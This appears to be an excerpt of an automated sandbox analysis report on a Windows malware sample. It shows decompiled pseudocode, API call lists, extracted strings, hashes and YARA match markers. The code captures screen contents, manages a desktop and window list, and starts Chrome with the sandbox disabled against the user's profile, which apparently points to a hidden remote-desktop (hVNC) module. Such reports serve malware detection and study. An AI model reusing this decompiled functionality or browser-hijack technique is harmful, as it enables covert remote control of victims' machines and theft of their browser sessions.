                                          								__eflags =  *_t121 -  *((intOrPtr*)(_t90 + 0xc0)); // 0x00c7d1d4
                                          								if(__eflags != 0) { // 0x00c7d1db
                                          									_t81 = 0xfffffff0; // 0x00c7d1dd  (-16 = GWL_STYLE, the index passed to GetWindowLongPtrA)
                                          									__imp__GetWindowLongPtrA(); // 0x00c7d1e2
                                          									asm("dec eax"); // 0x00c7d1e8
                                          									if(__eflags >= 0) { // 0x00c7d1ed  (sign test on the style: bit 31 is WS_POPUP; popups take the GetParent branch)
                                          										L11: // 0x00c7d208
                                          										_t115 =  *_t121; // 0x00c7d208
                                          										__eflags =  *_t121 -  *((intOrPtr*)(_t90 + 0xe8)); // 0x00c7d20b
                                          										if( *_t121 !=  *((intOrPtr*)(_t90 + 0xe8))) { // 0x00c7d212
                                          											_t73 = E00C82150(_t90, _t90, _t115); // 0x00c7d217
                                          											__eflags = _t73; // 0x00c7d21c
                                          											if(_t73 == 0) { // 0x00c7d21e
                                          												__eflags =  *(_t121 + 0x2c); // 0x00c7d220
                                          												if( *(_t121 + 0x2c) == 0) { // 0x00c7d223
                                          													L16: // 0x00c7d247
                                          													_t86 =  *_t121; // 0x00c7d247
                                          													r12d = r12d + 1; // 0x00c7d24a  (first HWND array, count in r12d)
                                          													 *_t145 = _t86; // 0x00c7d24d
                                          													_t145 = _t145 + 8; // 0x00c7d250
                                          													__eflags = _t145; // 0x00c7d250
                                          												} else { // 0x00c7d225
                                          													_t74 = E00C7BB64(_t86, _t90, _t90 + 0x88,  *_t121, _t136); // 0x00c7d22f
                                          													__eflags = _t74; // 0x00c7d234
                                          													if(_t74 < 0) { // 0x00c7d236
                                          														goto L16; // 0x00000000
                                          													} else { // 0x00c7d238
                                          														_t86 =  *_t121; // 0x00c7d238
                                          														r13d = r13d + 1; // 0x00c7d23b  (second HWND array, count in r13d)
                                          														 *_t148 = _t86; // 0x00c7d23e
                                          														_t148 = _t148 + 8; // 0x00c7d241
                                          													} // 0x00c7d241
                                          												} // 0x00c7d236
                                          											} // 0x00c7d223
                                          										} // 0x00c7d21e
                                          									} else { // 0x00c7d1ef
                                          										E00C81DFC(GetParent(), _t90, _t86); // 0x00c7d1fe
                                          										__eflags = _t86; // 0x00c7d203
                                          										if(_t86 == 0) { // 0x00c7d206
                                          											goto L11; // 0x00000000
                                          										} // 0x00000000
                                          									} // 0x00c7d206
                                          								} // 0x00c7d1ed
                                          							} // 0x00c7d1db
                                          							_t121 =  *((intOrPtr*)(_t121 + 0x38)); // 0x00c7d254
                                          							__eflags = _t121; // 0x00c7d258
                                          						} while (_t121 != 0); // 0x00c7d258
                                          					} // 0x00c7d1b7
                                          					LeaveCriticalSection(); // 0x00c7d268
                                          					_t67 = E00C6ADD8(); // 0x00c7d26e
                                          					__eflags = _t67 - 5; // 0x00c7d273
                                          					if(_t67 > 5) { // 0x00c7d276
                                          						_t86 =  *((intOrPtr*)(_t90 + 0x38)); // 0x00c7d278
                                          						 *((long long*)(_t129 + 0x30)) = _t126 + 0x1250; // 0x00c7d283  (lpdwResult)
                                          						r9d = 0; // 0x00c7d288  (lParam)
                                          						__eflags = r9d; // 0x00c7d288
                                          						 *((intOrPtr*)(_t129 + 0x28)) = 0x3e8; // 0x00c7d292  (uTimeout = 1000 ms)
                                          						_t81 =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x38)) + 0x150)); // 0x00c7d29a
                                          						_t41 = _t136 + 8; // 0x00c7d2a0  (0x8)
                                          						r8d = _t41; // 0x00c7d2a0  (wParam)
                                          						 *((intOrPtr*)(_t129 + 0x20)) = 2; // 0x00c7d2a4  (fuFlags = SMTO_ABORTIFHUNG)
                                          						SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??); // 0x00c7d2ac
                                          					} // 0x00c7d2ac
                                          					_t110 =  *(_t90 + 0x110); // 0x00c7d2b2
                                          					_t132 = _t129 + 0x50; // 0x00c7d2b9
                                          					r9d = 0; // 0x00c7d2be
                                          					_t95 = _t90; // 0x00c7d2c1
                                          					__eflags =  *(_t90 + 0x110); // 0x00c7d2c4
                                          					if(__eflags == 0) { // 0x00c7d2c7
                                          						_t110 =  *((intOrPtr*)(_t90 + 0xc0)); // 0x00c7d2c9
                                          					} // 0x00c7d2c9
                                          					E00C7CDE8(_t77, _t81, __eflags, _t86, _t90, _t95, _t110, _t121, _t126, _t132); // 0x00c7d2d0
                                          					_t143 = r12d; // 0x00c7d2d5
                                          					_t122 = _t118; // 0x00c7d2d8
                                          					__eflags = r12d; // 0x00c7d2db
                                          					if(__eflags > 0) { // 0x00c7d2de
                                          						do { // 0x00c7d2e0  (E00C7CDE8 is called once per collected HWND of the first array)
                                          							r9d = 0; // 0x00c7d2ed
                                          							E00C7CDE8(_t77, _t81, __eflags, _t86, _t90, _t90,  *((intOrPtr*)(_t126 + 0x280 + _t122 * 8)), _t122, _t126, _t129 + 0x50); // 0x00c7d2f3
                                          							_t122 = _t122 + 1; // 0x00c7d2f8
                                          							__eflags = _t122 - _t143; // 0x00c7d2fb
                                          						} while (__eflags < 0); // 0x00c7d2fb
                                          					} // 0x00c7d2e0
                                          					_t87 =  *((intOrPtr*)(_t90 + 0x38)); // 0x00c7d300
                                          					_t111 =  *((intOrPtr*)(_t87 + 0x110)); // 0x00c7d304
                                          					__eflags =  *((intOrPtr*)(_t87 + 0x110)) -  *((intOrPtr*)(_t90 + 0xc0)); // 0x00c7d30b
                                          					if(__eflags == 0) { // 0x00c7d312
                                          						L26: // 0x00c7d324
                                          						r9d = 1; // 0x00c7d330
                                          						_t69 = E00C7CDE8(_t77, _t81, __eflags, _t87, _t90, _t90,  *((intOrPtr*)(_t90 + 0xe8)), _t122, _t126, _t129 + 0x50); // 0x00c7d339
                                          					} else { // 0x00c7d314
                                          						_t69 = E00C7C0C0(__eflags, _t87, _t90, _t90 + 0x88, _t111, _t122); // 0x00c7d31b
                                          						__eflags = _t69; // 0x00c7d320
                                          						if(__eflags == 0) { // 0x00c7d322
                                          							goto L26; // 0x00000000
                                          						} // 0x00000000
                                          					} // 0x00c7d322
                                          					_t123 = r13d; // 0x00c7d33e
                                          					__eflags = r13d; // 0x00c7d341
                                          					if(__eflags > 0) { // 0x00c7d344
                                          						do { // 0x00c7d346  (and once per HWND of the second array)
                                          							r9d = 0; // 0x00c7d350
                                          							_t69 = E00C7CDE8(_t77, _t81, __eflags, _t87, _t90, _t90,  *((intOrPtr*)(_t129 + 0x60 + _t118 * 8)), _t123, _t126, _t129 + 0x50); // 0x00c7d356
                                          							_t118 = _t118 + 1; // 0x00c7d35b
                                          							__eflags = _t118 - _t123; // 0x00c7d35e
                                          						} while (__eflags < 0); // 0x00c7d35e
                                          					} // 0x00c7d346
                                          				} else { // 0x00c7d143  (flag 0x10 set: plain rectangle copy; __rdx is a RECT: +0 left, +4 top, +8 right, +0xc bottom)
                                          					r8d =  *((intOrPtr*)(_t109 + 4)); // 0x00c7d146  (y = top)
                                          					r9d =  *(_t109 + 8); // 0x00c7d14d
                                          					r9d = r9d -  *_t109; // 0x00c7d158  (cx = right - left)
                                          					 *((intOrPtr*)(_t129 + 0x40)) = 0xcc0020; // 0x00c7d15d  (rop = SRCCOPY)
                                          					 *((intOrPtr*)(_t129 + 0x38)) = 0; // 0x00c7d165  (y1)
                                          					 *((intOrPtr*)(_t129 + 0x30)) = 0; // 0x00c7d169  (x1)
                                          					 *((long long*)(_t129 + 0x28)) =  *((intOrPtr*)(_t90 + 0x718)); // 0x00c7d16d  (hdcSrc kept in the object at +0x718)
                                          					 *((intOrPtr*)(_t129 + 0x20)) =  *((intOrPtr*)(_t109 + 0xc)) - r8d; // 0x00c7d172  (cy = bottom - top)
                                          					_t69 = BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??); // 0x00c7d17d
                                          				} // 0x00c7d17d
                                          				return _t69; // 0x00c7d383
                                          			}

                                          APIs
                                          • BitBlt.GDI32 ref: 00C7D17D
                                          • EnterCriticalSection.KERNEL32 ref: 00C7D195
                                          • GetWindowLongPtrA.USER32 ref: 00C7D1E2
                                          • GetParent.USER32 ref: 00C7D1F2
                                          • LeaveCriticalSection.KERNEL32 ref: 00C7D268
                                          • SendMessageTimeoutA.USER32 ref: 00C7D2AC
                                            • Part of subcall function 00C7C134: IsWindowVisible.USER32 ref: 00C7C141
                                            • Part of subcall function 00C7C134: GetWindowLongPtrA.USER32 ref: 00C7C153
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Window$CriticalLongSection$EnterLeaveMessageParentSendTimeoutVisible
                                          • String ID:
                                          • API String ID: 401506982-3916222277
                                          • Opcode ID: 5cd3191dc9867e4fbd879d3a7d868b8812633289150fa82f185cd43a6b9ca914
                                          • Instruction ID: 86f0da5f46f6f810c0953403a7c13d7a977911f721e8eaaafea2ce42fea7e0d1
                                          • Opcode Fuzzy Hash: 5cd3191dc9867e4fbd879d3a7d868b8812633289150fa82f185cd43a6b9ca914
                                          • Instruction Fuzzy Hash: B1619E72600A8186DB20DF66E884B9DB770FB84B98F54D126DE9E57B19DF38C946C700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(?,?,?,EB8400006BEB0604,00000000,00C7A25D,?,?,?,?,?,00000000,?,?,?,00C68A52), ref: 00C6A81E
                                          • GetLastError.KERNEL32(?,?,?,EB8400006BEB0604,00000000,00C7A25D,?,?,?,?,?,00000000,?,?,?,00C68A52), ref: 00C6A82C
                                          • GetProcAddress.KERNEL32(?,?,?,EB8400006BEB0604,00000000,00C7A25D,?,?,?,?,?,00000000,?,?,?,00C68A52), ref: 00C6A843
                                          • GetProcAddress.KERNEL32(?,?,?,EB8400006BEB0604,00000000,00C7A25D,?,?,?,?,?,00000000,?,?,?,00C68A52), ref: 00C6A85F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$ErrorLastLibraryLoad
                                          • String ID: GetFileVersionInfoSizeW$GetFileVersionInfoW$version.dll
                                          • API String ID: 856020675-3712324480
                                          • Opcode ID: 12c2892c24bafd35cc36d2639a651858eed0a3b396698e5198d03df72e303dd5
                                          • Instruction ID: 94ef54bc7c1db501a076829bda0ec80d506bfd00f62cc99c93884c239f27c1e9
                                          • Opcode Fuzzy Hash: 12c2892c24bafd35cc36d2639a651858eed0a3b396698e5198d03df72e303dd5
                                          • Instruction Fuzzy Hash: F931AD25311B50C2FA25DF26A99477873A0FB8CBC0F888525DE5987BA0EF38D956CB05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: InfoScrollWindowmemcpy$LongRect
                                          • String ID: <
                                          • API String ID: 3098753545-4251816714
                                          • Opcode ID: 228a1bdf78abf8bbfd02746428e78e8adbc5d70c02e7b8df79f843006920e6ce
                                          • Instruction ID: 8fb6d7c7e0eeeb72c45fd0451ddf7af04a07b835d61f87b2d0861917267aa00f
                                          • Opcode Fuzzy Hash: 228a1bdf78abf8bbfd02746428e78e8adbc5d70c02e7b8df79f843006920e6ce
                                          • Instruction Fuzzy Hash: 9A411572200680CBE724CF39D6847597BB1F744B58F58C229D7598BB88DB38DAA6CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DrawEdgeFillFlushMessageRectRedrawSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 3441529251-3916222277
                                          • Opcode ID: 1fbe38d4c53676b44ff0be5f19b5406879ae57a14be3ec98e3957c8e6a08e534
                                          • Instruction ID: 3eee1ee7a5ddade1941cae826513ba45903a229b308f3fdab2e8a5d6055ea41a
                                          • Opcode Fuzzy Hash: 1fbe38d4c53676b44ff0be5f19b5406879ae57a14be3ec98e3957c8e6a08e534
                                          • Instruction Fuzzy Hash: DC313A72B107948AE720CF75D884BAD37B0F788B88F659625EE5853B18DF38D545CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • windows.immersiveshell.serviceprovider.dll, xrefs: 00C655F3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentPathThread$ProcessSleepStripTerminatelstrcmpi
                                          • String ID: windows.immersiveshell.serviceprovider.dll
                                          • API String ID: 193402735-1793758754
                                          • Opcode ID: 7768f837a86c71dd1e7d68554337c9d2e0fc20300c6b86a63a5b9b3f12096609
                                          • Instruction ID: 14ecfc4fa30308a25d3322cd4b1f3ab82af7770c497d29afe276fc08924630b5
                                          • Opcode Fuzzy Hash: 7768f837a86c71dd1e7d68554337c9d2e0fc20300c6b86a63a5b9b3f12096609
                                          • Instruction Fuzzy Hash: CC217C71615E41C6FB318F22FC98BAA2361FB88B95FD48221E95A477A4DF3CC648C700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • LOCALAPPDATA, xrefs: 00C76E02
                                          • --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11, xrefs: 00C76DE0
                                          • chrome.exe, xrefs: 00C76E10
                                          • Google\Chrome\User Data, xrefs: 00C76DEC
                                          • --user-data-dir=, xrefs: 00C76DF3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: PathRemove$ArgsBlanks
                                          • String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --user-data-dir=$Google\Chrome\User Data$LOCALAPPDATA$chrome.exe
                                          • API String ID: 3367427818-2742134296
                                          • Opcode ID: 9dbd9f02be9c4d631c13305b79552afdf29e61fc5d1963a78389d4248d556a87
                                          • Instruction ID: 9f9a881554868da91e85192bb1bfd36bd816d7a8e365b778cb9adc3603d3b50d
                                          • Opcode Fuzzy Hash: 9dbd9f02be9c4d631c13305b79552afdf29e61fc5d1963a78389d4248d556a87
                                          • Instruction Fuzzy Hash: 1D014B75218F8591FB208B11F9407AA73A4F788BD4F44C226EA8D07B28EF7CC155C745
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00C78C30: WaitForSingleObject.KERNEL32(?,?,00000000,00C7E25E,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C78C3E
                                          • GetParent.USER32 ref: 00C79620
                                          • GetWindowLongPtrA.USER32 ref: 00C79632
                                          • memcpy.NTDLL(?,?,00000000,?,00008001,00000000), ref: 00C79659
                                          • GetWindowRect.USER32 ref: 00C7972E
                                          • IsRectEmpty.USER32 ref: 00C79798
                                          • memcpy.NTDLL(?,?,00000000,?,00008001,00000000), ref: 00C797BB
                                          • MapWindowPoints.USER32 ref: 00C797D8
                                          • SetWindowPos.USER32(?,?,00000000,?,00008001,00000000), ref: 00C79833
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Rectmemcpy$EmptyLongObjectParentPointsSingleWait
                                          • String ID:
                                          • API String ID: 3774690360-0
                                          • Opcode ID: aa9efaa93de9f7f9a1fb15a6149ad01a6a4ca1f5c9edaf0f07e7b0414d1c939b
                                          • Instruction ID: 578bb85acbdac44de3140affbe41ee8a3b290fe0d7e788c9f4828fd224e61ab5
                                          • Opcode Fuzzy Hash: aa9efaa93de9f7f9a1fb15a6149ad01a6a4ca1f5c9edaf0f07e7b0414d1c939b
                                          • Instruction Fuzzy Hash: D7719C37A107508AEB18CF76C5586AC3BB5F384BA8B16C61ADE1E13B18DF38CA45C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 15%
                                          			E00C7B7B0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                                          				signed int _t22;
                                          				void* _t51;
                                          				void* _t54;
                                          				void* _t57;
                                          				void* _t78;
                                          				void* _t81;
                                          				void* _t85;
                                          				void* _t89;
                                          
                                          				_t89 = __r9;
                                          				_t55 = __rbx;
                                          				_t54 = _t85;
                                          				 *((long long*)(_t54 + 8)) = __rbx;
                                          				 *((long long*)(_t54 + 0x10)) = __rbp;
                                          				 *((long long*)(_t54 + 0x18)) = __rsi;
                                          				 *((long long*)(_t54 + 0x20)) = __rdi;
                                          				_t81 = __rdx;
                                          				_t78 = __rcx;
                                          				if(( *(__rcx + 0x30) & 0x00000400) == 0) {
                                          					if(E00C6ADD8() > 5) {
                                          						L4:
                                          						_t22 = E00C7BB64(_t54, _t55, _t78, _t81, _t89);
                                          						if((_t22 & 0x00000020) == 0) {
                                          							GetWindow();
                                          							GetWindow(??, ??);
                                          							_t57 = _t54;
                                          							do {
                                          								if(E00C7C134(_t57, _t57) != 0) {
                                          									__imp__GetWindowLongPtrA();
                                          									E00C7BB64(_t54, _t57, _t78, _t57, _t89);
                                          									GetAncestor(??, ??);
                                          									if((bpl & 0x00000020) == 0 || _t57 == _t81) {
                                          										L13:
                                          										asm("dec ecx");
                                          										if(__eflags < 0) {
                                          											goto L14;
                                          										}
                                          									} else {
                                          										_t51 = _t54 - _t81;
                                          										if(_t51 == 0) {
                                          											goto L13;
                                          										} else {
                                          											asm("dec eax");
                                          											if(_t51 >= 0 || E00C6ADD8() <= 5) {
                                          												r9d = 0;
                                          												r8d = 0;
                                          												PostMessageA(??, ??, ??, ??);
                                          											} else {
                                          												L14:
                                          												__eflags = 0;
                                          												ShowWindow(??, ??);
                                          											}
                                          										}
                                          									}
                                          								}
                                          								_t22 = GetWindow();
                                          								_t57 = _t54;
                                          							} while (_t54 != 0);
                                          						}
                                          					} else {
                                          						_t22 = E00C7BB64(_t54, __rbx, __rcx, __rdx, __r9);
                                          						if((0x00000800 & _t22) == 0) {
                                          							GetAncestor();
                                          							_t22 = E00C7BB64(_t54, _t55, _t78, _t54, __r9);
                                          							if((0x00000800 & _t22) == 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t22;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Ancestor$LongMessageParentPostShow
                                          • String ID:
                                          • API String ID: 841378396-0
                                          • Opcode ID: 87eedf9789e6ad9aae0f70fba10c0c8284d4d142c0ca73d7d6d5ce79c6f98ae2
                                          • Instruction ID: b157c9b5cbc106b89a59bd050f2106afe0ac35c93e49b253f5864528f843cd97
                                          • Opcode Fuzzy Hash: 87eedf9789e6ad9aae0f70fba10c0c8284d4d142c0ca73d7d6d5ce79c6f98ae2
                                          • Instruction Fuzzy Hash: CB31A221700B4146FF24AB22A9457296369FB89FC4F58D130EE1E47B99EF3CCD46870A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00C7E238(void* __edx, void* __eflags, long long __rbx, signed long long* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a8, long long _a16, long long _a24) {
                                          				char _v40;
                                          				signed int _t38;
                                          				int _t40;
                                          				long _t43;
                                          				long _t44;
                                          				long _t49;
                                          				signed short _t52;
                                          				signed int _t56;
                                          				signed int _t59;
                                          				signed int _t60;
                                          				signed long long _t65;
                                          				long long _t66;
                                          				char* _t80;
                                          				signed long long* _t81;
                                          				void* _t89;
                                          				void* _t90;
                                          
                                          				_t90 = __r10;
                                          				_t89 = __r8;
                                          				_t84 = __rbp;
                                          				_t82 = __rsi;
                                          				_t66 = __rbx;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t81 = __rcx;
                                          				E00C78C30(__edx, __rdx);
                                          				_t65 =  *((intOrPtr*)(__rdx + 0x20));
                                          				_t59 =  *(_t65 + 0x15c);
                                          				_t60 =  *(_t65 + 0x158);
                                          				r15d =  *(_t65 + 0x160) & 0x0000ffff;
                                          				E00C78CF0();
                                          				GetCurrentThreadId();
                                          				GetThreadDesktop(??);
                                          				 *__rcx = _t65;
                                          				GetDesktopWindow();
                                          				__rcx[6] =  *(_t65 + 0x154);
                                          				_t52 = (r15w & 0xffffffff) >> 3;
                                          				__rcx[0xa] = _t65;
                                          				_t56 = (_t52 & 0x0000ffff) * _t60;
                                          				_t38 = _t56 * _t59;
                                          				if((_t38 & 0x0000000f) != 0) {
                                          					_t38 = (_t38 & 0xfffffff0) + 0x10;
                                          				}
                                          				 *(_t81 + 0x216) = _t52;
                                          				 *(_t81 + 0x21c) = _t56;
                                          				 *(_t81 + 0x210) = _t59;
                                          				 *(_t81 + 0x20c) = _t60;
                                          				 *(_t81 + 0x214) = r15w;
                                          				 *(_t81 + 0x218) = _t38;
                                          				lstrcpyA(??, ??);
                                          				_t40 = lstrlenA(??);
                                          				r8d = 0;
                                          				 *(_t81 + 0x6e8) = _t40;
                                          				CreateMutexA(??, ??, ??);
                                          				 *(_t81 + 0x6e0) = _t65;
                                          				if(_t65 != 0) {
                                          					_t24 = _t81 + 0x220; // 0x2a8
                                          					r9d = _t60;
                                          					r8d = _t59;
                                          					_t80 =  &_v40;
                                          					E00C7EADC(_t65, _t66, _t24, _t80, _t89, _t90);
                                          					_t26 = _t80 + 1; // 0x1
                                          					r8d = _t26;
                                          					_t43 = E00C7DBCC(_t65, _t66, _t81, _t80, _t82, _t84);
                                          					_t49 = _t43;
                                          					if(_t43 == 0) {
                                          						_t44 = 0;
                                          					} else {
                                          						CloseHandle();
                                          						 *(_t81 + 0x6e0) =  *(_t81 + 0x6e0) & 0x00000000;
                                          						_t44 = _t49;
                                          					}
                                          				} else {
                                          					_t44 = GetLastError();
                                          				}
                                          				return _t44;
                                          			}

                                          APIs
                                            • Part of subcall function 00C78C30: WaitForSingleObject.KERNEL32(?,?,00000000,00C7E25E,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C78C3E
                                          • GetCurrentThreadId.KERNEL32 ref: 00C7E284
                                          • GetThreadDesktop.USER32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E28C
                                          • GetDesktopWindow.USER32 ref: 00C7E295
                                          • lstrcpyA.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E2F9
                                          • lstrlenA.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E306
                                          • CreateMutexA.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E319
                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E32B
                                            • Part of subcall function 00C7EADC: GetDC.USER32 ref: 00C7EB0F
                                            • Part of subcall function 00C7EADC: GetDeviceCaps.GDI32 ref: 00C7EB22
                                            • Part of subcall function 00C7EADC: ReleaseDC.USER32 ref: 00C7EE18
                                            • Part of subcall function 00C7DBCC: GetDC.USER32 ref: 00C7DBF2
                                            • Part of subcall function 00C7DBCC: SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC0E
                                            • Part of subcall function 00C7DBCC: DeleteObject.GDI32 ref: 00C7DC1B
                                            • Part of subcall function 00C7DBCC: DeleteDC.GDI32 ref: 00C7DC28
                                            • Part of subcall function 00C7DBCC: CreateCompatibleDC.GDI32 ref: 00C7DC31
                                            • Part of subcall function 00C7DBCC: GetLastError.KERNEL32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC43
                                            • Part of subcall function 00C7DBCC: SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DD2D
                                            • Part of subcall function 00C7DBCC: DeleteObject.GDI32 ref: 00C7DD47
                                            • Part of subcall function 00C7DBCC: DeleteDC.GDI32 ref: 00C7DD61
                                            • Part of subcall function 00C7DBCC: SelectObject.GDI32 ref: 00C7DD94
                                            • Part of subcall function 00C7DBCC: DeleteObject.GDI32 ref: 00C7DDAE
                                            • Part of subcall function 00C7DBCC: DeleteDC.GDI32 ref: 00C7DDC8
                                            • Part of subcall function 00C7DBCC: ReleaseDC.USER32 ref: 00C7DDE0
                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7E365
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Object$Delete$Select$CreateDesktopErrorLastReleaseThread$CapsCloseCompatibleCurrentDeviceHandleMutexSingleWaitWindowlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3932841243-0
                                          • Opcode ID: fe8d4a15274e399b6428fd2b6646c3c6fa4d6b84c28d52f8cf9816cad1a1a260
                                          • Instruction ID: de6f4728779e32929c2db75156b7e9a80b490c459c7d73404f64a7c63973a4af
                                          • Opcode Fuzzy Hash: fe8d4a15274e399b6428fd2b6646c3c6fa4d6b84c28d52f8cf9816cad1a1a260
                                          • Instruction Fuzzy Hash: F0318A76700B8197E718DF26E94879DB7A1F788B80F448226DF5987B21DF38D0798744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
